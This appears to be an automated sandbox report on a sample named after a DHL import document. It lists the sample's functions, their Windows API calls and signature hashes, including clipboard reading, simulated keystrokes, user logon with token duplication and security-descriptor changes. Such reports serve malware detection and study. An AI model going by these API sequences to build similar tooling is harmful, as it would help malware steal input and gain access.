Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: File$Pointer$Write
String ID:
API String ID: 3847668363-0
Opcode ID: 9d4ff95476b5deb6d4b7d1a597b6834a8eff95239875607d0103c782ba6cc25b
Instruction ID: 34671befeb765ba928f6615894ee6c17994f0f9ca218882ab5c1e750f7f809a9
Opcode Fuzzy Hash: 9d4ff95476b5deb6d4b7d1a597b6834a8eff95239875607d0103c782ba6cc25b
Instruction Fuzzy Hash: 51E03076400604EFC7219F56D94089ABFF8FFC5255710852FE95582114D771AA54DB60

Function 004E2DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 004E2DC4

Part of subcall function 004E6B57: _wcslen.LIBCMT ref: 004E6B6A

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 7289a7474e9f50cf2fefcfbd332e3052b9a859a4f0473ef9bc6460cb95b9b1c4
Instruction ID: e797f00f2a0690d59ea60af38d9db917d7b852a082e73f2451491404e88c112b
Opcode Fuzzy Hash: 7289a7474e9f50cf2fefcfbd332e3052b9a859a4f0473ef9bc6460cb95b9b1c4
Instruction Fuzzy Hash: 3CE0CD76A001345BC71092599C05FDA7BDDEFC87D0F050075FD09D7258D964ADC48554

Function 004E2B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 004E3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 004E3908

Part of subcall function 004ED730: GetInputState.USER32 ref: 004ED807

SetCurrentDirectoryW.KERNEL32(?), ref: 004E2B6B

Part of subcall function 004E30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 004E314E

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: 069a5f31baa9f31eb2f9623f10c50781d9637020f4cbe1bc2b18d8b29ede881d
Instruction ID: 90b64c85bb72313ce7eecce90ca71ed3bc8922df23868fb3f861cf78dc380d4b
Opcode Fuzzy Hash: 069a5f31baa9f31eb2f9623f10c50781d9637020f4cbe1bc2b18d8b29ede881d
Instruction Fuzzy Hash: A8E026217002C407CA04BF33A82A4BDB789ABE135BF80193FF042431A2CE2C49894319

Function 0052039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00520704,?,?,00000000,?,00520704,00000000,0000000C), ref: 005203B7

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 58962557923e888f0f2e223c9f1818b3176ad250348af9617026d29d096f81a3
Instruction ID: df5e396639deb4d98e8ca1be872f6d39d904dd8ff9a73ce0a42282089bbbc4be
Opcode Fuzzy Hash: 58962557923e888f0f2e223c9f1818b3176ad250348af9617026d29d096f81a3
Instruction Fuzzy Hash: E3D06C3204010DBBDF028F84ED06EDA3FAAFB48714F014050BE1856020C732E861EB90

Function 004E1CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 004E1CBC

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: 78bae2038fa6518a1e4a16ee1f84a261384afbb253cb122df9af8a1be4830509
Instruction ID: 219afa3d2db85c84220a540b6b099a651c2b767e1c8781e02899d9637bfa669a
Opcode Fuzzy Hash: 78bae2038fa6518a1e4a16ee1f84a261384afbb253cb122df9af8a1be4830509
Instruction Fuzzy Hash: EFC09B352803049FF2544780BC5AF107754A368B01F444501F60D595E3D3A23454FB54

Function 0055744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 004E5745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,004E949C,?,00008000), ref: 004E5773

GetLastError.KERNEL32(00000002,00000000), ref: 005576DE

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: 1dcc2992fafd56deb6b379dcd83329c49a84d0db882a43bbc541dcc4823fff8a
Instruction ID: 3c182a31b56c482fae91d29561fefa4418d0b8bc09ca6690162d183c413fc5be
Opcode Fuzzy Hash: 1dcc2992fafd56deb6b379dcd83329c49a84d0db882a43bbc541dcc4823fff8a
Instruction Fuzzy Hash: 0B81F5302087059FC714EF16C4A1A6DBBE1BF88359F04491EFC865B292DB34ED49CB56

Function 004E6246 Relevance: 1.3, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,00000000,005224E0), ref: 004E6266

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 46f37de92d279b2a9af11c335858630fe2a30f5f448bcecc9efde60a7e7c6b8a
Instruction ID: 7dc4d9da34d3293a4ce3bd8656cef9800f4efff1d67ac2bf1859bc4a5ada0aca
Opcode Fuzzy Hash: 46f37de92d279b2a9af11c335858630fe2a30f5f448bcecc9efde60a7e7c6b8a
Instruction Fuzzy Hash: BFE09275800B01CFD3315F1AE804412FBE6FFE13A23214A6FD1E592660D3B4588A9B55

Function 033E22E8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 033E22F9

Memory Dump Source

Source File: 00000000.00000002.1660044699.00000000033E0000.00000040.00000020.00020000.00000000.sdmp, Offset: 033E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_33e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 46316edb6615c7f728a2c232df6bc9bb969b1bb694687e39fef6f7e3be6cb7de
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 58E0E67494010DDFDB00EFB8D54969E7BB4EF04301F1005A1FD01D2280DB309D508A72

Non-executed Functions

Function 00579576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 004F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 004F9BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0057961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0057965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0057969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 005796C9
SendMessageW.USER32 ref: 005796F2
GetKeyState.USER32(00000011), ref: 0057978B
GetKeyState.USER32(00000009), ref: 00579798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 005797AE
GetKeyState.USER32(00000010), ref: 005797B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 005797E9
SendMessageW.USER32 ref: 00579810
SendMessageW.USER32(?,00001030,?,00577E95), ref: 00579918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0057992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00579941
SetCapture.USER32(?), ref: 0057994A
ClientToScreen.USER32(?,?), ref: 005799AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 005799BC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 005799D6
ReleaseCapture.USER32 ref: 005799E1
GetCursorPos.USER32(?), ref: 00579A19
ScreenToClient.USER32(?,?), ref: 00579A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 00579A80
SendMessageW.USER32 ref: 00579AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00579AEB
SendMessageW.USER32 ref: 00579B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00579B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00579B4A
GetCursorPos.USER32(?), ref: 00579B68
ScreenToClient.USER32(?,?), ref: 00579B75
GetParent.USER32(?), ref: 00579B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 00579BFA
SendMessageW.USER32 ref: 00579C2B
ClientToScreen.USER32(?,?), ref: 00579C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00579CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 00579CDE
SendMessageW.USER32 ref: 00579D01
ClientToScreen.USER32(?,?), ref: 00579D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00579D82

Part of subcall function 004F9944: GetWindowLongW.USER32(?,000000EB), ref: 004F9952

GetWindowLongW.USER32(?,000000F0), ref: 00579E05

Strings

F, xrefs: 00579D07
p#[, xrefs: 00579990
@GUI_DRAGID, xrefs: 0057997D

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F$p#[
API String ID: 3429851547-397413873
Opcode ID: 3fe1bb43cac841d9a2c2873784c834d8fc52f1c5cfebb6221853c6bfd7eba8ca
Instruction ID: 7819033a44b6d3bb31f7f327c3800ac444d9be685183ec40f8f186e6db24b856
Opcode Fuzzy Hash: 3fe1bb43cac841d9a2c2873784c834d8fc52f1c5cfebb6221853c6bfd7eba8ca
Instruction Fuzzy Hash: 90428F74204241AFDB24CF28EC84EAABFE5FF59314F10861DF65D8B2A1D731A854EB61

Function 00574873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 005748F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00574908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00574927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0057494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0057495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0057497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 005749AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 005749D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00574A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00574A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00574A7E
IsMenu.USER32(?), ref: 00574A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00574AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00574B20
GetWindowLongW.USER32(?,000000F0), ref: 00574B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00574BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00574C82
wsprintfW.USER32 ref: 00574CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00574CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 00574CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00574D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00574D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 00574D5A

Strings

%d/%02d/%02d, xrefs: 00574CA8

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d
API String ID: 4054740463-328681919
Opcode ID: 639b4343e38a88eafd02251854987537204d197f51f3b6159c3665bc070873e4
Instruction ID: dc94817fe7fc0b6f181b3f79ff158420b45a95880f2c006822488e0523c7c44c
Opcode Fuzzy Hash: 639b4343e38a88eafd02251854987537204d197f51f3b6159c3665bc070873e4
Instruction Fuzzy Hash: 2012EF71600218ABEB258F29EC49FAE7FA8BF45310F10852DF91ADA2E1D7749944EF50

Function 004FF98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 004FF998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0053F474
IsIconic.USER32(00000000), ref: 0053F47D
ShowWindow.USER32(00000000,00000009), ref: 0053F48A
SetForegroundWindow.USER32(00000000), ref: 0053F494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0053F4AA
GetCurrentThreadId.KERNEL32 ref: 0053F4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0053F4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 0053F4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0053F4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0053F4DE
SetForegroundWindow.USER32(00000000), ref: 0053F4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 0053F4F6
keybd_event.USER32(00000012,00000000), ref: 0053F501
MapVirtualKeyW.USER32(00000012,00000000), ref: 0053F50B
keybd_event.USER32(00000012,00000000), ref: 0053F510
MapVirtualKeyW.USER32(00000012,00000000), ref: 0053F519
keybd_event.USER32(00000012,00000000), ref: 0053F51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 0053F528
keybd_event.USER32(00000012,00000000), ref: 0053F52D
SetForegroundWindow.USER32(00000000), ref: 0053F530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 0053F557

Strings

Shell_TrayWnd, xrefs: 0053F46F

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 04ef8960e4d07b80cbec1d5e720743c6d5ddd82e6aecdde4a0844bfc4ef0ab88
Instruction ID: 360c63aef9a6f4c806afed723f7acbc8f644ac00cd8686f9cf36667f08db2afb
Opcode Fuzzy Hash: 04ef8960e4d07b80cbec1d5e720743c6d5ddd82e6aecdde4a0844bfc4ef0ab88
Instruction Fuzzy Hash: 8D313071A40218BBEB206BB56C4AFBF7E6CEB44B50F100469FA05EA1D1C6B15D50BBA1

Function 00541201 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 005416C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0054170D
Part of subcall function 005416C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0054173A
Part of subcall function 005416C3: GetLastError.KERNEL32 ref: 0054174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00541286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 005412A8
CloseHandle.KERNEL32(?), ref: 005412B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 005412D1
GetProcessWindowStation.USER32 ref: 005412EA
SetProcessWindowStation.USER32(00000000), ref: 005412F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00541310

Part of subcall function 005410BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,005411FC), ref: 005410D4
Part of subcall function 005410BF: CloseHandle.KERNEL32(?,?,005411FC), ref: 005410E9

Strings

ZZ, xrefs: 00541392
winsta0, xrefs: 005412CC
, xrefs: 0054125A
default, xrefs: 0054130B

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0$ZZ
API String ID: 22674027-2020913014
Opcode ID: 11c0398554668bb0bec4b7507108f157d85c62afd824168323aed2ca977eedcf
Instruction ID: 40f19e7e8105dade15fe854296709587dce10980836d8d62ccf090d56e28503a
Opcode Fuzzy Hash: 11c0398554668bb0bec4b7507108f157d85c62afd824168323aed2ca977eedcf
Instruction Fuzzy Hash: 7E819C71900209AFDF209FA4DC49FEE7FB9FF04708F144129FA14A61A0D7359988EB64

Function 00540B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 005410F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00541114
Part of subcall function 005410F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00540B9B,?,?,?), ref: 00541120
Part of subcall function 005410F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00540B9B,?,?,?), ref: 0054112F
Part of subcall function 005410F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00540B9B,?,?,?), ref: 00541136
Part of subcall function 005410F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0054114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00540BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00540C00
GetLengthSid.ADVAPI32(?), ref: 00540C17
GetAce.ADVAPI32(?,00000000,?), ref: 00540C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00540C6D
GetLengthSid.ADVAPI32(?), ref: 00540C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00540C8C
HeapAlloc.KERNEL32(00000000), ref: 00540C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00540CB4
CopySid.ADVAPI32(00000000), ref: 00540CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00540CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00540D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00540D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00540D45
HeapFree.KERNEL32(00000000), ref: 00540D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00540D55
HeapFree.KERNEL32(00000000), ref: 00540D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00540D65
HeapFree.KERNEL32(00000000), ref: 00540D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 00540D78
HeapFree.KERNEL32(00000000), ref: 00540D7F

Part of subcall function 00541193: GetProcessHeap.KERNEL32(00000008,00540BB1,?,00000000,?,00540BB1,?), ref: 005411A1
Part of subcall function 00541193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00540BB1,?), ref: 005411A8
Part of subcall function 00541193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00540BB1,?), ref: 005411B7

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 998156f2537c11ceac18b29abeb1d6b1f9fc1700f833232376e6631a0d35f110
Instruction ID: d5b890b54ecfbec4181459e6c2f44dc78150b8932cd944c36aa1d999628c627e
Opcode Fuzzy Hash: 998156f2537c11ceac18b29abeb1d6b1f9fc1700f833232376e6631a0d35f110
Instruction Fuzzy Hash: 4B717E7290020AAFDF10DFE4DC48BEEBFB8BF54304F144529EA18A7191D771A949DBA0

Function 0055EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0057CC08), ref: 0055EB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 0055EB37
GetClipboardData.USER32(0000000D), ref: 0055EB43
CloseClipboard.USER32 ref: 0055EB4F
GlobalLock.KERNEL32(00000000), ref: 0055EB87
CloseClipboard.USER32 ref: 0055EB91
GlobalUnlock.KERNEL32(00000000), ref: 0055EBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 0055EBC9
GetClipboardData.USER32(00000001), ref: 0055EBD1
GlobalLock.KERNEL32(00000000), ref: 0055EBE2
GlobalUnlock.KERNEL32(00000000), ref: 0055EC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 0055EC38
GetClipboardData.USER32(0000000F), ref: 0055EC44
GlobalLock.KERNEL32(00000000), ref: 0055EC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0055EC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0055EC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0055ECD2
GlobalUnlock.KERNEL32(00000000), ref: 0055ECF3
CountClipboardFormats.USER32 ref: 0055ED14
CloseClipboard.USER32 ref: 0055ED59

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: e3cf8273402953e7716eb4b5011368ad27530cd1e22f00121bcc217fb6399118
Instruction ID: cc050b376372b041363dcf560dbcbaf14d6adbf59180125819a80fbd252fc3a0
Opcode Fuzzy Hash: e3cf8273402953e7716eb4b5011368ad27530cd1e22f00121bcc217fb6399118
